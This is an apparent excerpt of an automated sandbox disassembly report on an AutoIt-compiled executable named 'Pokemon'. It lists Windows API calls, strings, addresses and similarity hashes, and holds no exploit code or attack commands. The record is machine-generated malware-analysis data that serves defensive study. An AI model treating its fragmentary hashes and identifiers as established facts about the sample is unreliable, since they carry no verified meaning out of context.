                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: 15f644079fef9879976d3016aee765826700c45e19f0e4068594142ef68eab4d
                                                                                                                                                                                                                                                                                      • Instruction ID: 4fbf514f6dc34f35a31ed2fe7b60d72d3fe8206c7b7152ca35a9d395e8b89965
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15f644079fef9879976d3016aee765826700c45e19f0e4068594142ef68eab4d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5201F775A41108ABCF14E790D922DFF33A8DF45B50F5001197912A7682DB249F0CE6B1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 000F2615
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: 2d55b71affb59400c8bbe5ef404c65166e190454775370be666de9ade427ea34
                                                                                                                                                                                                                                                                                      • Instruction ID: fbdb10cecc726698333411ea5a7ec8ffae0885b5414a1bab2a7c949d384696c6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d55b71affb59400c8bbe5ef404c65166e190454775370be666de9ade427ea34
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0001A275A41108A6CF15E7A0D901EFF77A89B05750F500025B912E3682DB658F0CE6B1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 000F2720
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: a1d32f5a4c09d9aeb785e7acaea6f19229daca1c7d5c5ef57f9e18c32160443e
                                                                                                                                                                                                                                                                                      • Instruction ID: bd05a1a2c310370ef00b707b9aabcd41676990ec1c4bcbe6d885b92d750145e5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1d32f5a4c09d9aeb785e7acaea6f19229daca1c7d5c5ef57f9e18c32160443e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AF0F475A41218A6CB14F3A49C51FFE73A8EF01760F400915B932A36C3DB60590CE6A0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000F146F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                      • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                      • Opcode ID: 4041e9cb52aa50df20ef6c822a5d040bcda64a036e8ea9f0d6a5b1aa87ba9ab3
                                                                                                                                                                                                                                                                                      • Instruction ID: 2d8b4fdfb8c4bffcb3a675c71149f17b4a0c40c45c0ae2e2c640f3c3f719b102
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4041e9cb52aa50df20ef6c822a5d040bcda64a036e8ea9f0d6a5b1aa87ba9ab3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABE048312887287BD6242798FC07FD576858F05B55F11481AF758695C34FE224A052DD
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000B10E2,?,?,?,0009100A), ref: 000AFAD9
                                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0009100A), ref: 000B10E6
                                                                                                                                                                                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0009100A), ref: 000B10F5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000B10F0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                      • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                      • Opcode ID: 58c0edace60c98487b20c84e5fbd249724caa35ce6e17f8de42daaa3d7fbdfa7
                                                                                                                                                                                                                                                                                      • Instruction ID: 928c78c4a1a60e8e98cf8c4338f32510bc3291e202159d4f1187cad333256c60
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58c0edace60c98487b20c84e5fbd249724caa35ce6e17f8de42daaa3d7fbdfa7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87E06D706007118FD331AF68E9183C2BBF4EB18301F008D2CE885C2A52DBB4D484CB91
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001039F0
                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00103A05
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                      • String ID: aut
                                                                                                                                                                                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                      • Opcode ID: a431be4080c6e86c368e77008806e9b56bcfe267feb0d462b4e7758194878bcb
                                                                                                                                                                                                                                                                                      • Instruction ID: 8df32cd2a46de49b2eca01eb7c4e3cb77d5e988f50d4197b6b1a6254fadefafe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a431be4080c6e86c368e77008806e9b56bcfe267feb0d462b4e7758194878bcb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0D05E72500328B7DA30A764EC0EFCB7A7CDB44711F0002A1BA65960D1DAF0DA8ACB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00122DC8
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00122DDB
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FF292: Sleep.KERNEL32 ref: 000FF30A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                      • Opcode ID: 68280a93179c32bba79ba43152b7d84a72bdfd812c8db0c7d7bae129a868544c
                                                                                                                                                                                                                                                                                      • Instruction ID: 7e4a41ebfa65eb647fc2d84b3b2c22a7b55fdb0cb9bf0fbee16e09a349806d1b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68280a93179c32bba79ba43152b7d84a72bdfd812c8db0c7d7bae129a868544c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5D02235384300B7F274B330FC0FFE63B209F00B00F1048207309AA8C0CAE06841C640
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00122E08
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 00122E0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FF292: Sleep.KERNEL32 ref: 000FF30A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                      • Opcode ID: 4df71bace7be7613de8ac101403313266dd659c1f7f0d5dc986972ea75279cc0
                                                                                                                                                                                                                                                                                      • Instruction ID: ee700bbb7b488c538ea2b16514e4beb6e67e7efa48125716e33c1962b82d9ab6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4df71bace7be7613de8ac101403313266dd659c1f7f0d5dc986972ea75279cc0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAD0A931381300BAF274A330FC0FFE63A209B04B00F1048207305AA8C0CAE068418644
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 000CC213
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000CC221
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000CC27C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b2858f9c355ed8cb818ecdf802ddc0340d93f9d006add0ecad3d5993632a5dde
                                                                                                                                                                                                                                                                                      • Instruction ID: de58bcdbc0e5c40c0711b639a4416d2030bb515b1dc3f6979fb324b4660c81a5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2858f9c355ed8cb818ecdf802ddc0340d93f9d006add0ecad3d5993632a5dde
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC41A431600606AFEB619FE5C844FBE7BE5AF51710F2441ADF85E9B2A1DB309D41CB60